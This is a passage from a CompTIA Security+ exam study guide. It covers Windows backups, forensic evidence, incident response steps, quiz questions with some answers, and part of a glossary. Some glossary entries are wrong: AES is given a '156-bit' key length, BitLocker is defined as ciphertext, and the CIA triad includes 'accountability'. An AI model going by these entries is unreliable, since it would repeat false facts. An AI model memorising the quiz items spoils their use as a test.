6. Create and apply a backup testing schedule.

Creating Windows backups


While third-party backup solutions are best for enterprise situations or exacting needs, you can schedule
regular backups using built-in Windows utilities. The exact backup procedure will depend on your version of
Windows, but the procedure generally includes the following steps.

1. Open your backup tool.

Windows version Backup tool

Windows 7 and Windows 10 Backup and Restore

Windows 8 and Windows 8.1 File History

Windows Server Windows Server Backup or wbadmin command line tool (Must
install as server role)

2. Choose a location to store the backed up files.


Removable devices, network storage, offsite backup, and cloud vendors each have benefits and
drawbacks.
3. Choose the files you want to back up, if you want to back up files that aren't in the common Windows
folders.
To enable quick recovery of your entire system drive, choose the option to create a system image. You
can do this separately from or along with your usual data backups.
4. Set a schedule for the backups. You can typically choose anywhere from hourly to weekly.
5. Start the backup, if it doesn't start automatically.

488 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Exercise: Using Windows Server Backup


Windows includes basic backup and recovery tools. In Windows Server, you'll need to install the Windows
Server backup feature.

Do This How & Why

1. In Windows Server 2012, install the


Windows Server Backup feature.

a) In Server Manager, click Manage > The Add Roles and Features Wizard window opens.
Add Roles and Features.

b) Click Next Four times. Skip the Select server roles screen and move to Select features.

c) Check Windows Server Backup


and click Next.

d) Click Install. The process might take a few minutes.

e) Click Close.

2. Schedule a backup.

a) In Server Manager, click Tools > The wbadmin console opens.


Windows Server Backup.

b) In the left pane, click Local


Backup.

c) In the Actions pane, click Backup The Backup Schedule Wizard window opens.
Schedule.

d) Click Next. You're asked whether to back up the whole server, or custom
files and volumes.

e) Click Next. To select the full server backup. On the next screen, you can
choose a backup time.

CompTIA Security+ Exam SY0-501 489


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Do This How & Why

f) From the Select time of day list, You could even specify multiple backups per day.
select 2:00 AM and click Next.

3. Choose a backup location. In a real-world situation you'd have a dedicated location for
backups. In this case, there's a shared folder on the host
computer.

a) Examine your backup options. You can back up to a dedicated hard drive, a specific volume
on a drive, or a shared network folder.

b) Select Back up to a shared Click OK to close the warning window.


network folder and click Next.

c) Enter the location of the shared It should be something like \\VBOXSVR\Backups


folder on your host computer.

d) Click Next. A login window appears.

e) Enter Administrator's username and


password, then click OK.

f) At the Conformation screen, click You may receive an error that keeps the backup from
Finish. finalizing, due to the shared folder situation on the hypervisor.
In a real world situation, you'd be using a more suitable
location anyway.

4. Click Close.

490 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Assessment: Fault tolerance and recovery


1. Which of the following RAID levels incorporates disk striping?
 RAID 0
 RAID 1
 RAID 5
 RAID 10

2. The process of rebuilding a RAID drive from parity data can cause a RAID drive to fail.
 True.
 False.

3. If you have a RAID implementation with data parity, you don't need data backups.
 True.
 False.

4. You have a critical database server that constantly backs its files up to the cloud, but its software
environment is so finicky that if it encountered a critical failure it would take a long time to get it working
again. How would you describe your recovery plan for that service?
 High RPO and high RTO
 High RPO and low RTO
 Low RPO and high RTO
 Low RPO and low RTO

5. Clustering is similar to load balancing, but tends to use tighter integration between redundant systems.
True or false?
 True
 False

CompTIA Security+ Exam SY0-501 491


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

6. Your company rents a spare server room in a secondary location. It has all necessary hardware, software,
and network services, and you just need to load the latest backups to get it in operation. What is it?
Choose the best answer.
 Hot site
 Hot spare
 Cold site
 Cold spare

7. In terms of time, how does a differential backup plan generally differ from an incremental backup plan?
 It's quicker both to create backups and to restore data
 It's quicker to create backups, but slower to restore data
 It's slower to create backups, but quicker to restore data
 It's slower both to create backups and to restore data

8. What backup type might require specific operating system support? Choose the best response.
 Differential
 Full
 Incremental
 Snapshot

492 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

Module C: Incident response


If you're lucky enough, all the time you spend working on security will be wasted because you never suffer
any successful attacks or data loss. That's a dangerous goal to bank on, so instead you should be hoping you
prepare well enough that when the incident happens the damage will be limited. When the inevitable attack
comes, even if your defenses come out unscathed, you'll still need a better response plan than sitting there and
looking smug.
You will learn:
 How to collect forensic evidence
 About incidents
 How to respond to an incident

Forensic evidence
You should always document your work, both to make sure everything's been done properly and to inform
future activities. Especially when something goes wrong, complete and well-organized evidence of what's
happened is the best way to make sure you understand the entire problem and how to keep it from recurring.
If we could all trust each other, you could stop there, but when a problem results from malicious activity or
just employee negligence, you need to be able to prove it to hold the responsible party accountable. You might
even need to prove that you're not lying to get someone else in trouble or to cover up your own wrongdoing.
Forensics is the science of collecting evidence that's admissible in court. To be admissible, forensic evidence
needs to be relevant to a legal case, sufficient in detail to prove a claim, and have an documented chain of
custody proving that it was collected legitimately and hasn't been altered since. Forensic investigation is
necessary for any evidence you plan to use in a legal or criminal court proceeding, and many organizations
apply forensics to formal internal investigations. The three might require different standards of proof, so it's
important to have a legal adviser available whenever you collect forensic evidence.
Legal evidence can fall into multiple categories, and you might need to gather any of them as part of an
investigation.

Testimony A sworn statement, oral or written, by a person with knowledge relevant to the
case. Testimony might be from a witness to disputed events, or from an expert on
the evidence or facts being discussed in the case.
Real evidence A physical object presented to prove a point. In a murder trial, the weapon or DNA
found on the scene would be real evidence. Also called physical evidence.
Demonstrative evidence Representations of objects or events. Photographs, medical X-rays, audio or video
recordings, drawings, or models are all examples of demonstrative evidence.
Demonstrative evidence that's in the form of written documents or other media is
often called documentary evidence.
Digital evidence Evidence that's recorded or transmitted in a digital format. Digital evidence can be
video or audio, transaction logs, email messages, databases, backups, or almost
anything else stored on a computer or electronic device. Since many types of
digital evidence are extremely easy to modify or even fabricate outright,
guaranteeing its authenticity is a particular challenge.

CompTIA Security+ Exam SY0-501 493


Chapter 11: Disaster planning and recovery / Module C: Incident response

Collecting evidence
When you collect forensic evidence, especially digital evidence, it's critical to make sure that it's complete,
and also that it's veritably authentic. You can achieve the first by being methodical in your collection: it's
better to collect too much at first and have to pare it down later than it is to miss something. The second
requires maintaining an audit trail establishing a chain of custody from the discovery of the evidence to its
presentation in court. The audit trail exists to show that the evidence was legally collected and its integrity
was preserved. Each piece of evidence needs to be uniquely labeled, and have its own documentation
including a chronological record of custody transfers. In the case of digital evidence, cryptographic hashes are
an essential tool in verifying no alteration has taken place.

Exam Objective: CompTIA SY0-501 5.5


When conducting a forensic investigation it's also important to track man-hours and other expenses both for
the evidence gathering and for repairing any damages that were done. Not only will your superiors want to
know what the incident and related investigation cost for their own sake, they might be important to calculate
damages in a civil or criminal suit.
Remember that a forensic investigation isn't just making sure your results are authentic and complete. They
also need to give answers relevant to the case. Think of the questions that a judge or review board might ask
—the who, what, when, where and how of the events you're documenting.

1. Secure physical and remote access to any systems or data relevant to the investigation before they can be
accidentally or deliberately altered.
2. If important evidence is in the custody of another person or business entity, you may be able to access it
through an eDiscovery process. This can take a while: to prevent its alteration or destruction before then,
act quickly in conjunction with legal staff to place it under a legal hold.
3. Classify available evidence according order of volatility. By collecting the most time-sensitive or easily
changed evidence first, you minimize the chance of losing it. On a typical computer, the order of
volatility might be as follows.
a) CPU registers and cache memory
b) Routing tables, ARP cache, process tables, and kernel stats
c) Other RAM contents
d) Swap files or other temporary file systems
e) Other data on hard drives or flash media
f) Remote logging data
g) Firmware or physical configuration
h) Archival media such as optical discs or printouts
4. Capture evidence using relevant tools.
• Review system and network logs to record events or trends.
• Actively log ongoing attacks, both to gather intelligence about the attacker and counterintelligence that
can be used to protect against similar attacks in the future.
• System images can perfectly record the state of an affected system. Specialized forensic backup
software is better suited for the purpose than ordinary backups are. Some can even capture the contents
of system memory as well as what is on disk.
• If data has been deleted but not completely erased or destroyed, it can be covered using a variety of
tools. Exactly what can be recovered depends on how securely the original data was erased, and on
how much time and expense you're prepared to put into recovery.
• Screenshots are an easy way to record volatile data, and are sometimes clearer and more concise than
system logs.

494 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

• Collect relevant surveillance videos, and consider recording video of your collection process in order
to answer any later questions.
• Workstations, and even many servers, often have their system time set incorrectly, never mind those
actually located in different time zones. Even a slight discrepancy can make log files misleading, so
record the time offset for each affected system so that you can determine the real-world time for every
logged event.
• Speak with witnesses as soon as possible. Collect written statements or recorded interviews in order to
keep a permanent record of what they saw.
• Massive Big Data sets used in some industries are impractical to copy or fully investigate with normal
techniques. If your investigation requires it, you will need special tools and expertise.
5. Take hashes of all collected digital data, and store it securely along with documentation of the collection
process. Any alteration of the data later will change the hash.
6. Analyze collected data to mark what is and is not relevant to the case. For example, unaltered system files
on a disk image aren't likely important, but user documents may well be. Some forensic tools are
specialized for this.
7. Assemble your findings into a report including a summary of the items investigated, the steps taken
during the investigation, and potentially relevant evidence.
Note: Confidential data that's become evidence is still confidential. Even if you have to reveal it to a
courtroom, you still need to keep it secure against unauthorized viewing or copying by anyone else.

Discussion: Forensic evidence


1. Have you been involved in any security incidents where forensic data handling was important?
Answers may vary.
2. Search on the web for forensic backup and ediscovery software. Note the common features they offer.
Results may vary.

Incident response teams


When an incident occurs time is critical, so not only do you need a clear incident response policy, you also
need to identify and train an incident response team(IRT) that will be prepared to handle things properly when
the need arises. Incident response teams vary by field: in information security you'll most commonly see
computer security incident response teams (CSIRT). Exactly how big the team needs to be depends on the size
of your organization and the scope of the incident, and it's often a good idea to train a variety of people as
incident responders and then assemble teams as needed with skills suited to a particular incident. Areas of
expertise a full incident response team might need include:

Exam Objective: CompTIA SY0-501 5.4.1.2, 5.4.1.4

Leadership Not only do you need someone with the organizational skill to direct the others,
you need someone with the authority within your organization to get the access
and resources needed to fix the problem.
Technical knowledge Each team needs at least one administrator, engineer, or other expert that's familiar
with any affected systems, and who can advise the rest of the team on the
technical nature of the incident and how to address it.
Security principles Security experts are trained in security principles. They should know how to
recognize attacks, collect forensic evidence, document procedures, and suggest
remedies. In many incidents, security and technical experts will need to work in
tandem.

CompTIA Security+ Exam SY0-501 495


Chapter 11: Disaster planning and recovery / Module C: Incident response

Human resources Incidents frequently involve employee actions, whether or not they are at fault.
When an employee becomes involved in an investigation you should consult HR
as to how to proceed.
Legal adviser While a security expert should know something about forensics, larger scale
incidents may raise additional legal or policy questions which legal staff are better
equipped to address.
Communications Publicly visible incidents, or those that directly impact users or customers, require
someone to communicate with those affected. Careless statements can compound
incidents in any number of ways. Even if it's not a controversial affair, a single
spokesperson for the incident response team reduces the chance of confusing other
parties.

Some team members should also be trained as first responders. They're the ones who immediately react to an
alert to investigate an incident, then determine its nature and scope. First responders must have the technical
knowledge to work with affected systems, and the security training to recognize attacks and follow forensic
principles. For minor incidents, the first responder might end up doing all the work and filing a report to
management. For major incidents, the first responder only contains things until the full team is on site.

The incident response process


Depending on your organization and what happens, the incident response process can be pretty simple. For
instance, you might respond to harmless but annoying spam email by adding the sender to a block list and
notifying your ISP. On the other hand, responding to a damaging incident or serious data breach might be a
big project in itself. Generally speaking, you can break incident response into seven distinct phases. (NIST
actually combines some of those steps into a four-phase process, but seven shows the detail a little more when
you're learning.)

Exam Objective: CompTIA SY0-501 5.4.2

1: Preparation Having tools and training in place before an incident occurs.


2: Identification Clearly detecting not only when an incident has occurred, but its nature and severity.
3: Containment Quarantining an incident to prevent spread. It may include stopping damaging events,
or just observing them in containment.
4: Investigation Identifying the precise effects and root causes of the incident.
5: Eradication Eliminating the root cause of the incident and preventing immediate recurrence.
6: Recovery Restoring services, validating proper operation, and otherwise returning the network to
its baseline state.
7: Lessons learned Reviewing information gathered during the previous steps and taking appropriate
action.

Remember that the goal of the entire process is to assess damage done to your organization's assets, and
minimize losses. It's also important from the start to apply forensic principles so that evidence won't be lost or
rendered inadmissible in future legal proceedings.

Preparing for incidents


Incidents can happen at any time and require immediate response, so the first step is to be thoroughly
prepared. This goes hand-in-hand with prevention, but it's not the same thing: no matter how carefully you
harden your network you can only make serious incidents less common, not eliminate them entirely.
Preparation is a crucial step, since how well you educate and equip your response team will determine how
the whole response process plays out.

496 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

Exam Objective: CompTIA SY0-501 5.4.1.1, 5.4.1.3, 5.4.1.5

 Develop policies and checklists for the identification and isolation of incidents.
 Document expected incident types and categories and how the nature of each affects the response
process.
 Create and maintain an organizational disaster recovery plan.
 Choose and train an event response team with a sufficiently broad set of skills.
 Conduct exercises based on likely or past incidents, in order to test the team's ability to respond.
 Ensure that the response team has sufficient authority and permissions to react appropriately in case of
an emergency.
 Equip the team with any tools needed for anticipated incidents.
 Educate other employees and users about their rights and duties in the incident response process, such as
privacy expectations and reporting requirements.
 Monitor system events both to detect security incidents and for later research in case of an incident.

Identifying incidents
If you're prepared, you'll be constantly monitoring events, and trying to determine which are potential security
incidents. Regardless of whether you're relying on automated systems or human observations, a false positive
can trigger an alert and force you to waste resources on an event that was entirely benign. At the same time,
that's better than a false negative where the damage is done without anyone even noticing.

1. Rely on multiple sources for information, including IDS, administrator review of logs and monitoring
systems, and user reports of suspicious or unusual activity.
2. Examine anything that seems out of the usual to determine if it requires immediate action.
• Examine system logs and configuration files related to the event as well as the initial alert.
• Distinguish whether it is ordinary activity or a potential threat.
• Make a decision quickly but accurately: slow response to an emergency can be disastrous, but so can
the wrong response.
3. Evaluate the incident's nature. This doesn't just help to determine the potential severity, but also how to
proceed.
• Unauthorized access
• Data breach
• Theft
• Vandalism
• Unlawful activity
• Malware
• Improper usage
• Denial of service
• Scans, probes, or attempted access

CompTIA Security+ Exam SY0-501 497


Chapter 11: Disaster planning and recovery / Module C: Incident response

4. Evaluate the incident's scope and severity.


• How many systems are affected?
• How critical are the affected systems or data?
• What is still at risk?
• Is the incident time-critical?
5. Escalate the incident appropriately by communicating your findings to the IRT, management, and
whoever else is relevant to the specific event type.

Containing incidents
Once your team knows the type and level of incident they're dealing with, you're ready to contain it. The goal
of containment is to keep the incident from escalating and to minimize operational impact to the organization.
For forensics purposes, it's also important not to destroy or obscure evidence of the incident's cause.
Depending on the nature and severity of an incident, there might be several options or stages in containment.

 Shutting affected services or systems down entirely


 Quarantining affected systems from the network
 Allowing affected systems to operate, but directly monitoring them
 Temporarily repairing recognized or introduced vulnerabilities to prevent further damage
 Securing related or vulnerable assets
 Bringing backup systems online

Investigating incidents
At this point you should have some idea of what has happened, but you probably haven't had the luxury to get
a complete picture. A thorough investigation isn't just important for solving problems and preventing
recurrence: it's also vital for gathering any evidence you'll need for the followup process. This means you
need to keep written documentation of whatever you find and whatever you do in responding to the incident.
If there's a chance of criminal activity, civil liability, or even just formal organizational proceedings, you need
to treat this step as a forensic investigation. In that case, you'll need to use a process called electronic
discovery, or eDiscovery, where you identify, secure, and analyze data with the intent of using it in a criminal
or civil court case. Even if you don't need to follow strict forensic standards, the principles of formal evidence
gathering are good to keep in mind.

1. Determine what data needs to be collected. If you're not certain, it's better to collect too much than too
little.
2. Include any information placed on a legal hold by other involved parties. If information not in your
organization's control is relevant, coordinate with an attorney to establish a legal hold on it.
3. Secure physical and remote access to any systems or data relevant to the investigation before they can be
accidentally or deliberately altered.
4. Document the scene (whether physical or digital) as you found it.
• Document any known changes made during containment or before the area was fully secured.
• Use forensic backup software to make disk images, copy memory, or save configuration files; these
applications will preserve valuable information conventional backup software will not.
• Verify that the gathered information will answer any questions (Who, What, Where, Why, and How)
that later investigation.

498 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

5. Secure the confidentiality, integrity, and authenticity of your findings. For a forensic investigation this
means a full chain of custody. For an ordinary investigation you just need to make sure it's accurate and
doesn't cause any security leaks itself.

Eradicating problems
Once you know you won't be losing or destroying valuable evidence, you can get on with the next step:
eliminating the root cause of a problem and repairing any affected systems. Like every other step, exactly
what this takes depends on what the incident was and how much damage it did, and you will need to
document the process for later review.

1. Clean up the damage.


• Repair or replace damaged hardware.
• Remove infected software or unauthorized accounts.
• Replace passwords or other credentials for compromised accounts.
• Fully restore systems from installation media or trusted backups.
• Restore the network structure.
2. Based on current knowledge, harden the network against recurrence.
• Install any relevant updates and patches.
• Disable unnecessary services.
• Revise configuration files, ACLs, or other network settings.
3. Notify relevant personnel that all affected systems have been cleaned and secured.

Restoring service
Once the root problem is eradicated, you can get the network back to its normal functions. This isn't just the
same as turning everything on again: you need to make sure there's no lasting damage that you've missed, and
that the problem doesn't immediately recur before you really bring affected systems back into production.

1. Create a service restoration plan. It should not only include a timeline for restoring services, but also a
testing process beforehand and ongoing monitoring for a set period afterward.
2. Certify that restored systems are operational and secure, without signs of abnormal behavior.
3. Formally restore services.
4. Continue monitoring for repeating or secondary issues.

CompTIA Security+ Exam SY0-501 499


Chapter 11: Disaster planning and recovery / Module C: Incident response

Following up on incidents
Once services are restored and forensic information has been handed over to investigators, the followup
process begins with asking questions. Their answers will determine what, if anything, needs to be done next:
they should be drafted in a report for submission to the response team and management. This is commonly
called the lessons learned phase.

 What was the total extent of the incident?


• Scope
• Cost
• Duration
 Was the response adequate?
• Was preparation sufficient?
• Was detection timely?
• Were communications and documentation thorough and clear?
 How can similar future incidents be prevented?
• Education
• Policies
• Security measures

Discussion: Examining the incident response process


1. Identify people in your organization who might have the skills to join an incident response team.
Answers may vary.
2. What is the difference between a forensic investigation and just keeping thorough documentation of your
findings?
The big difference is that a forensic investigation produces evidence that is suitable for presenting to a
court. This means you have to establish a chain of custody, make it clear that the findings have not been
altered or falsified, and will answer any necessary legal, as well as practical, questions a court may have.
3. How can problems arise between incident containment and incident investigation?
The steps needed to contain an incident quickly and completely might interfere with evidence needed for
later investigation. It's important to reconcile the two based off the urgency of containment.
4. Identify the response steps you've taken, or seen taken, for a past security incident. Consider both what
happened, and how the process could have been improved.
Answers may vary.

500 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

Assessment: Incident response


1. Order the steps of the incident response process.

1. Containment
2. Eradication
3. Followup
4. Identification
5. Investigation
6. Preparation
7. Recovery
6, 4, 1, 5, 2, 7, 3
2. What is eDiscovery? Choose the best answer.
 A process for identifying security incidents.
 A process for sharing electronic forensic data.
 A standard for forensic backup software.
 A software application used to track security incidents.

3. You should start choosing an incident response team as soon as you've identified an incident. True or
false?
 True
 False

4. After a security incident you rush to take a screenshot of a telltale running process before you leisurely
take a backup of suspicious files on the hard drive. What forensic principle are you exercising? Choose
the best response
 Audit trail
 Chain of custody
 eDiscovery
 Order of volatility

5. Why is it important to record a time offset when collecting evidence?


 To compensate for logging systems that don't record precise times
 To compensate for time differences between multiple systems
 To document the precise order of events
 To document the precise timing of events

CompTIA Security+ Exam SY0-501 501


Chapter 11: Disaster planning and recovery / Summary: Disaster planning and recovery

Summary: Disaster planning and recovery


You should now know:
 How to create and test business continuity plans, including business impact analysis and disaster
recovery plans, and how to test those plans.
 How to identify recovery objectives, implement fault tolerance and redundancy for critical systems,
and create sound data backup policies.
 About the principles of digital forensics, and how to design an effective incident response plan.

502 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

CompTIA Security+ Exam SY0-501 503


Appendix A: Glossary

504 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

802.1x - An authentication protocol used for user permissions, device configurations, and
network access control. One implementation is the software installations.
WPA-Enterprise mode on Wi-Fi networks
AUP - Acceptable use policy. Specifies how
AAA - Authentication, Authorization, and authorized users are allowed to utilize system
Accounting. A three-step security framework that resources, such as hardware, software, and network
comprises verification of a user's identity, services.
specification of the exact resources that user is
authentication - A process that ensures and
allowed to access, and tracking that user's actions
confirms a user's identity using credentials supplied
for later review.
by the user.
account expiration - Policies that automatically
authentication factor - Any element of the
disable or delete accounts after a set period, either
authentication process that serves to prove your
absolute or since the last login.
identity. Common authentication factors include
ACL - Access control list. A list attached to a passwords, fingerprints, and smart cards.
resource, giving permissions, or rules, about exactly
authorization - Specifying the exact resources a
who can access it.
given authenticated user is allowed to access.
Active Directory - A Microsoft directory service
availability - Ensuring that information is always
based on LDAP and Kerberos, used by Windows
easily accessible to authorized users. This includes
domains.
preventing data loss and preserving connectivity,
AES - Advanced Encryption Standard. A strong and performance, and usability.
widely used encryption standard, supporting 128,
backdoor - Any hidden way into a system or
192, and 156-bit key lengths.
application that bypasses normal authentication
AES-CCMP - The strongest available Wi-Fi systems.
encryption, supported by WPA2 and most WPA
banner grabbing - Using routine communications
devices.
with a host to gain information about its running
ALE - Annual loss expectancy. In quantitative risk services and open ports.
assessment, the cost per year you can expect from a
baseline - A minimum set of defined security
given threat, or the SLE x ARO.
standards.
algorithm - A well-defined set of instructions to
bastion host - A host that's directly exposed to an
perform a self-contained task, such as encryption or
untrusted network, and hardened against network
decryption of data.
attacks.
ARO - Annual rate of occurrence. In quantitative
bcrypt - A hashing algorithm designed for password
risk assessment, the number of times you can expect
storage, key derivation, and key stretching. bcrypt
a given type of loss to occur per year.
combines passwords with a 128-bit salt to create a
ARP - Address Resolution Protocol. Used to 184-bit hash.
identify the physical (MAC) address of a given IP
big data - Data sets too large to be handled by
address.
traditional data processing applications, but
ARP poisoning - A spoofing attack that targets the commonly seen in scientific data collection, internet
Layer 2 Address Resolution Protocol. search and tracking data, and business/finance. It
requires specialized tools to analyze and secure.
attack surface - The summary of all points in a host
or network that an attacker can target. biometrics - Personal physical characteristics, such
as fingerprints and retinal patterns, used as
attack vector - (Also known as threat vector.) The
inherence elements in the authentication process.
mechanism of a given threat to an asset. Examples
include malware, fraudulent email messages, and BitLocker - In cryptography, the result of
password cracking attempts. encryption performed on plaintext using an
algorithm, called a cipher. Ciphertext is also known
auditing - The formal process of reviewing key
as encrypted or encoded information because it
elements of your network infrastructure. Commonly
contains a form of the original plaintext that is
includes examination of security logs, incident
unreadable by a human or computer.
response reports, user/administrator activity logs,

CompTIA Security+ Exam SY0-501 505


Appendix A: Glossary

blacklist - A permissions list containing only client - A piece of computer hardware or software
explicit denials. that accesses a service made available by a server.
block cipher - A symmetric cipher that encrypts cloud computing - A service model for network-
plaintext in fixed-size blocks, applying the complete accessible computing services, which includes on-
key to each block. Blocks are typically 64 or 128 demand self-service, broad network access, resource
bits, but can use any key size. pooling, rapid elasticity, and measured service.
botnet - A network of malware-infected computers confidentiality - Ensuring that information is
that can perform attacks or do other tasks as directed viewable only by authorized users or systems, and is
by its controller, without the knowledge of the either inaccessible or unreadable to unauthorized
actual system owners. users.
broadcast address - A MAC or IPv4 address that content filters - Software applications designed to
designates a packet that should be read by all restrict network access to unwanted or objectionable
listening hosts. content, as opposed to malware or attacks.
broadcast domain - A network segmentation unit content switch - A higher layer router that balances
where all nodes can reach each other by broadcast at workload between multiple identical servers, while
the data link layer. making them look like a single server to the outside
network.
buffer overflow - The end result of including too
much information in a request sent to an application, control - Any tool, device, or human activity used
thereby overfilling the memory buffer and causing to decrease risk or otherwise achieve security goals.
overflow into adjacent memory.
cookies - Small text files stored in a user's browser,
BYOD - Bring your own device. A security policy containing information relevant to the web sites that
that allows or even encourages users to employ their user visits.
own personal devices freely on the network.
CRC - Cyclic redundancy check. An error detecting
CA - Certificate authority. A third-party entity code that can detect accidental alterations of stored
responsible for assignment, verification, and or transmitted data, but is not secure against
revocation of digital certificates. malicious alteration.
certificate - A special file attesting the identity of cross-site request forgery - (CSRF or XSRF) An
the computer or user that presents it. The certificate attack on a legitimate session between a legitimate
is cryptographically signed so that other computers web server and another user that exploits the site's
can verify its authenticity by one of several possible trust of the user, forging or altering requests from
means the client to the server within the context of the
session.
chain of custody - Documentation about the history
of a piece of forensic evidence from its discovery, to cross-site scripting - (XSS) A web application
demonstrate that it was collected legally and was attack where the attacker injects malicious scripts
not subsequently altered. into a web page viewed in the victim's browser. The
web page containing the script appears to be from a
CHAP - Challenge-handshake Authentication
trusted site so the browser will trust the script as
Protocol. A PPP protocol that uses a three-way
well.
handshake, with security provided by a shared secret
that isn't transmitted over the network. CSR - Certificate signing request. A request sent to
a CA containing all identifying information needed
CIA triad - Confidentiality, integrity, and
to request a new digital certificate.
accountability. The three primary goals of all
information security. DAC - Discretionary Access Control. An access
control model in which the owner or creator of each
cipher suite - In SSL/TLS connections, a linked set
controlled object decides who can access it and what
of cryptographic methods. A suite contains separate
permissions they have.
algorithms for bulk encryption, key exchange,
hashing, and pseudorandom number generation. defense in depth - A security strategy that arrays
controls in multiple layers so that an attacker who
ciphertext - In cryptography, data that has been
bypasses a single layer will not gain control of the
encrypted and is unreadable without the proper key.
entire system or network.

506 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

DES - Data Encryption Standard. A now-obsolete eDiscovery - Electronic discovery. A legal process
block cipher using a 56-bit key. While a long-used in which two parties in a court case can obtain
standard, DES is too weak for modern use. digital evidence from each other.
DHE - Diffie-Hellman Ephemeral. A protocol used EFS - Encrypting File System. Allows encryption of
to securely exchange temporary (ephemeral) keys individual drives and folders on any NTFS volume.
used for bulk encryption. EFS-encrypted files are unreadable to other users on
the same computer.
digital certificate - See Certificate. (Or swap, or
delete) EMI - Electromagnetic interference. Signal noise
from electromagnetic sources that interferes with
DLP - Data loss prevention software is used to
other equipment, especially data cables or wireless
prevent users from accidentally or maliciously
transceivers.
sharing particular types of data outside your
organization. encryption - A security control method that uses
mathematical processes to render data unreadable to
DMZ - Demilitarized zone, or perimeter network. A
those without the proper decryption key.
network zone that's under the organization's direct
control but separate from, and less trusted than, the ephemeral key - A cryptographic key that is
internal network. generated for each execution of a key establishment
process.
DNS - Domain Name System. A hierarchical
directory service that stores assigned domain names event - Any meaningful change in a system's state
and their corresponding IP addresses. that is both detectable and happened at a specific
time.
DNS poisoning - An attack that compromises or
impersonates domain name servers to redirect or failover - A method of protecting computer systems
block network requests. in which standby equipment automatically takes
over when the main system fails.
DOM - Document Object Model. The application
programming interface used by HTML and XML false negative - A type of event evaluation in which
documents, which defines their structure and the a problem occurred but the analysis mistook it for
way browsers access and manipulate them, benign behavior.
changing objects within the model changes the
false positive - A type of event evaluation in which
presentation of the page.
the behavior was benign but the analysis mistook it
DoS - Denial-of-service. Attacks designed to impair for a problem.
or block legitimate users' ability to use a network
fault tolerance - An availability control system
resource.
designed to continue functioning even when a
DPI - Deep packet inspection. A firewall feature hardware or software component fails.
that can inspect packet contents to enforce rules
FDE - Full drive encryption. A type of hardware-
based on high-level protocols a traditional firewall
based encryption that encrypts all data on a drive,
would not recognize.
rendering it unreadable unless the key is entered
DSA - Digital Signature Algorithm. An asymmetric during system boot or when it's connected.
encryption algorithm designed for digital signatures.
federated identity management - Allows
It has similar uses to RSA, but for some
authentication systems to be shared across multiple
implementation reasons is currently less popular.
systems or networks that share authentication
dual-homed server - A bastion host with two NICs, standards even if they're not directly associated with
configured as a firewall to bridge the inside and each other. Members of a federation can share
outside networks. authentication tokens, access shared authentication
servers, or otherwise behave as though they're part
EAP - Extensible Authentication Protocol. A PPP
of a unified security system.
extension that can also be used for wireless
authentication. Not an authentication method in firewall - A computer system or network component
itself, but rather a message format and set of that is designed to block unauthorized access while
common functions that can be used to support a permitting outward communication.
wide variety of specific authentication methods.

CompTIA Security+ Exam SY0-501 507


Appendix A: Glossary

forensics - The science of collecting evidence that's hash table - A database that stores the hashes used
admissible in court. To be admissible, forensic to uniquely identify files and other data elements in
evidence must be relevant to a legal case, sufficient a storage system. Hash tables are valuable for
in detail to prove a claim, and have an audit trail searching and organizing large amounts of data, for
proving that it was collected legitimately and hasn't example to recognize duplicate files even if they're
been altered since. stored in different folders or under different names.
FQDN - Fully qualified domain name. The hashing - The transformation of a string of
complete domain name for a specific computer, or characters into a usually shorter fixed-length value
host, on the Internet. Consists of two parts: the or key that represents the original string. Hashing is
hostname and the domain name. used to index and retrieve items in a database
because it is faster to find the item using the shorter
frame - A digital data transmission unit in computer
hashed key than to find it using the original value.
networking and telecommunication. A frame
typically includes frame synchronization features HIPAA - Health Insurance Portability and
consisting of a sequence of bits or symbols that Accountability Act.
indicate to the receiver, the beginning, and end of
HMAC - Hash-based message authentication code.
the payload data within the stream of symbols or
bits it receives. honeypot - A decoy system designed to be attractive
and accessible to attackers. It has no useful
fuzzing - A probe-based attack that inserts random
resources and is isolated from the rest of the
or invalid data into more complex header fields or
network. A honeypot is monitored to gather
application data inputs. In extreme cases, fuzzing
information on attackers without actually risking the
attacks can crash applications or entire systems, or
consequences of an attack on real systems.
gain access permissions; more commonly they're a
way to learn how a service or application responds host - A computer or other device connected to a
to non-standard input, enabling future attacks. computer network. A network host may offer
information resources, services, and applications to
GPG - GNU Privacy Guard. The GNU project's free
users or other nodes on the network.
software implementation of the OpenPGP standard
as defined by RFC4880. GPG is specifically a hosts file - An operating system file, in plain text
command line tool that enables you to encrypt and format, that maps hostnames to IP addresses.
sign your data and communication and includes a HTTPS - HTTP Secure. A protocol used for secure
key management system as well as access modules web pages and sites. It includes encryption services.
for all kind of public key directories.
hypervisor - A software abstraction layer that runs
GPO - Group policy object. In Windows 2000, a VMs as applications, effectively an operating
collection of settings that define what a system will system for operating systems. To the VM the
look like and how it will behave for a defined group hypervisor looks like underlying hardware, but it's
of users. actually just allocating host resources and allowing
guest network - In a WAP system, a separate multiple VMs to simultaneously share them.
network access point with its own SSID and login ICMP - Internet Control Message Protocol. A
credentials. Guest clients are on a separate network protocol used by network devices, including routers,
from internal clients, and can't communicate to them to send error messages and operational information
directly. They can only use the WAP for Internet indicating, for example, that a requested service is
access. not available or that a host or router could not be
hardening - The process of securing a system by reached.
reducing its surface of vulnerability, which is larger ICS - Industrial control system. A general term that
when a system performs more functions. This encompasses several types of control systems and
typically includes changing default passwords, the associated instrumentation used in industrial
removal of unnecessary software, unnecessary production technology, including supervisory
usernames or logins, and the disabling or removal of control and data acquisition systems, distributed
unnecessary services. control systems, and other smaller control system
configurations.
IDS - Intrusion detection systems.

508 CompTIA Security+ Exam SY0-501


Appendix A: Glossary

implicit deny - An ACL model in which access is Kerberos - A network authentication protocol that
denied unless a rule explicitly allows it. works on the basis of 'tickets' to allow nodes
